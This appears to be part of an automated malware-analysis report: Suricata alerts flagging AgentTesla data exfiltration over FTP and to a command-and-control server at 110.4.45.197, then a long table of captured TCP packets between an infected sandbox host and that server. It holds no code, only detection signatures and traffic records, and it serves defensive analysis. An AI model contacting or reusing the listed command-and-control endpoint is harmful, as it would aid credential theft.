                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-09-25T14:42:33.783691+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.949717110.4.45.19721TCP
                              2024-09-25T14:42:34.626804+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.949719110.4.45.19758009TCP
                              2024-09-25T14:42:34.633344+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.949719110.4.45.19758009TCP
                              2024-09-25T14:42:39.600523+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.949723110.4.45.19721TCP
                              2024-09-25T14:42:40.450522+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.949726110.4.45.19753264TCP
                              2024-09-25T14:42:40.459740+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.949726110.4.45.19753264TCP
                              2024-09-25T14:42:48.225577+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.955430110.4.45.19721TCP
                              2024-09-25T14:42:49.076789+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.955431110.4.45.19754539TCP
                              2024-09-25T14:42:49.082015+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.955431110.4.45.19754539TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 25, 2024 14:42:22.808478117 CEST49709443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:22.808532000 CEST44349709172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:22.808614016 CEST49709443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:22.821855068 CEST49709443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:22.821881056 CEST44349709172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:23.322808027 CEST44349709172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:23.322948933 CEST49709443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:23.357567072 CEST49709443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:23.357637882 CEST44349709172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:23.358108997 CEST44349709172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:23.404323101 CEST49709443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:23.911946058 CEST49709443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:23.955414057 CEST44349709172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:24.025492907 CEST44349709172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:24.025660992 CEST44349709172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:24.025731087 CEST49709443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:24.035404921 CEST49709443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:25.618757963 CEST4971121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:25.623650074 CEST2149711110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:25.623934031 CEST4971121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:25.628768921 CEST4971121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:25.633625984 CEST2149711110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:25.633692026 CEST4971121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:25.669079065 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:25.674038887 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:25.674154043 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:26.554580927 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:26.554840088 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:26.559585094 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:26.904500961 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:26.943182945 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:26.948046923 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:27.321655989 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:27.321796894 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:27.326765060 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:27.661900043 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:27.662194014 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:27.667042017 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:28.006783962 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:28.006975889 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:28.013983965 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:28.360621929 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:28.360764980 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:28.366066933 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:28.497895002 CEST49714443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:28.497942924 CEST44349714172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:28.498172045 CEST49714443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:28.502957106 CEST49714443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:28.502973080 CEST44349714172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:28.715434074 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:28.716159105 CEST4971554484192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:28.723326921 CEST5448449715110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:28.723450899 CEST4971554484192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:28.723539114 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:28.730189085 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:28.968799114 CEST44349714172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:28.968988895 CEST49714443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:28.975292921 CEST49714443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:28.975307941 CEST44349714172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:28.975554943 CEST44349714172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:29.183444977 CEST44349714172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:29.183662891 CEST49714443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:29.239263058 CEST49714443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:29.283409119 CEST44349714172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:29.346688986 CEST44349714172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:29.346772909 CEST44349714172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:29.346862078 CEST49714443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:29.354280949 CEST49714443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:29.608680964 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:29.617376089 CEST4971554484192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:29.617554903 CEST4971554484192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:29.622220993 CEST5448449715110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:29.622615099 CEST5448449715110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:29.623614073 CEST4971554484192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:29.701205015 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:29.968885899 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:29.973295927 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:29.979635000 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:30.320218086 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:30.320887089 CEST4971660403192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:30.327471018 CEST6040349716110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:30.327680111 CEST4971660403192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:30.328476906 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:30.335787058 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:30.801389933 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:30.806329966 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:30.806402922 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:31.384186983 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:31.389995098 CEST4971660403192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:31.390208006 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:31.390256882 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:31.397808075 CEST6040349716110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:31.397862911 CEST4971660403192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:31.635230064 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:31.635566950 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:31.640484095 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:31.731142998 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:31.731556892 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:31.736411095 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:31.962534904 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:31.963149071 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:31.968061924 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:32.075933933 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:32.076531887 CEST4971855829192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:32.082731962 CEST5582949718110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:32.082859039 CEST4971855829192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:32.089035034 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:32.093940973 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:32.325310946 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:32.325634003 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:32.330657959 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:32.652662992 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:32.657428026 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:32.662301064 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:32.911660910 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:32.911899090 CEST4971855829192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:32.919991016 CEST5582949718110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:32.921066999 CEST4971855829192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:32.966842890 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:32.986711025 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:32.986973047 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:32.993619919 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:33.239876032 CEST2149712110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:33.294928074 CEST4971221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:33.316895962 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:33.357469082 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:33.449080944 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:33.456129074 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:33.778009892 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:33.778656960 CEST4971958009192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:33.783516884 CEST5800949719110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:33.783579111 CEST4971958009192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:33.783690929 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:33.788511038 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:34.626370907 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:34.626804113 CEST4971958009192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:34.626847029 CEST4971958009192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:34.632961988 CEST5800949719110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:34.633290052 CEST5800949719110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:34.633343935 CEST4971958009192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:34.670005083 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:34.886576891 CEST49720443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:34.886639118 CEST44349720172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:34.886704922 CEST49720443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:34.890780926 CEST49720443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:34.890794039 CEST44349720172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:35.034544945 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:35.070092916 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:35.075097084 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:35.450246096 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:35.498078108 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:35.509779930 CEST44349720172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:35.509918928 CEST49720443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:35.549309015 CEST49720443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:35.549362898 CEST44349720172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:35.550246000 CEST44349720172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:35.609277010 CEST49720443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:36.060430050 CEST49720443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:36.065648079 CEST4972163289192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:36.070575953 CEST6328949721110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:36.070641041 CEST4972163289192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:36.071222067 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:36.076009989 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:36.107404947 CEST44349720172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:36.166415930 CEST44349720172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:36.166490078 CEST44349720172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:36.166551113 CEST49720443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:36.169717073 CEST49720443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:36.750165939 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:36.755023956 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:36.755089998 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:36.928812981 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:36.929054022 CEST4972163289192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:36.929100990 CEST4972163289192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:36.933953047 CEST6328949721110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:36.934624910 CEST6328949721110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:36.934670925 CEST4972163289192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:36.980067968 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:37.270031929 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:37.270481110 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:37.275294065 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:37.583060980 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:37.583281040 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:37.588126898 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:37.601094007 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:37.601607084 CEST4972457088192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:37.606452942 CEST5708849724110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:37.606532097 CEST4972457088192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:37.606585979 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:37.611352921 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:37.912306070 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:37.912535906 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:37.917402029 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.265619040 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.265788078 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:38.270566940 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.431421041 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.453553915 CEST4972457088192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:38.458750010 CEST5708849724110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.460557938 CEST4972457088192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:38.482527018 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:38.591711998 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.592644930 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:38.597621918 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.783453941 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.785008907 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:38.789844036 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.938766003 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.939066887 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:38.943948984 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.112016916 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.119362116 CEST4972554891192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.124424934 CEST5489149725110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.124506950 CEST4972554891192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.124619007 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.130100965 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.267407894 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.267564058 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.272524118 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.594686031 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.595324993 CEST4972653264192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.600353003 CEST5326449726110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.600446939 CEST4972653264192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.600522995 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.605353117 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.956085920 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.956338882 CEST4972554891192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.961500883 CEST5489149725110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.961580038 CEST4972554891192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.998111963 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:40.285213947 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:40.326210022 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:40.450242043 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:40.450521946 CEST4972653264192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:40.452512980 CEST4972653264192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:40.455465078 CEST5326449726110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:40.457782030 CEST5326449726110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:40.459739923 CEST4972653264192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:40.498110056 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:40.790472984 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:40.825231075 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:40.830246925 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:41.153971910 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:41.188102961 CEST5542756189192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:41.193123102 CEST5618955427110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:41.194629908 CEST5542756189192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:41.201292038 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:41.208826065 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:41.213665009 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.020953894 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.021167994 CEST5542756189192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.021202087 CEST5542756189192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.026232004 CEST5618955427110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.026773930 CEST5618955427110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.026818037 CEST5542756189192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.076210022 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.350935936 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.351356030 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.357284069 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.679596901 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.680042028 CEST5542865044192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.685103893 CEST6504455428110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.685179949 CEST5542865044192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.685287952 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.690208912 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:43.132358074 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.132409096 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.132572889 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.135869980 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.135888100 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.585841894 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:43.625462055 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.625572920 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.627717972 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.627749920 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.628609896 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.638744116 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:43.670002937 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.679562092 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.723428965 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.791080952 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.791162014 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.791234016 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.794167995 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:44.893953085 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:44.900595903 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:44.900697947 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:45.251916885 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:45.252820969 CEST5542865044192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:45.758148909 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:45.762273073 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:45.767213106 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:46.101133108 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:46.104639053 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:46.109493017 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:46.459978104 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:46.463820934 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:46.468727112 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:46.799571037 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:46.804580927 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:46.809519053 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:47.144850016 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:47.145196915 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:47.150094032 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:47.487152100 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:47.487413883 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:47.492291927 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:47.994132996 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:47.995132923 CEST5543154539192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:48.045166016 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:48.223854065 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:48.223906994 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:48.225296974 CEST5453955431110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:48.225368977 CEST5543154539192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:48.225577116 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:48.232645035 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:49.076314926 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:49.076788902 CEST5543154539192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.076852083 CEST5543154539192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.081737995 CEST5453955431110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:49.081945896 CEST5453955431110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:49.082015038 CEST5543154539192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.123198032 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.412595034 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:49.467031002 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.474122047 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.478949070 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:49.805684090 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:49.809808969 CEST5543260779192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.814781904 CEST6077955432110.4.45.197192.168.2.9
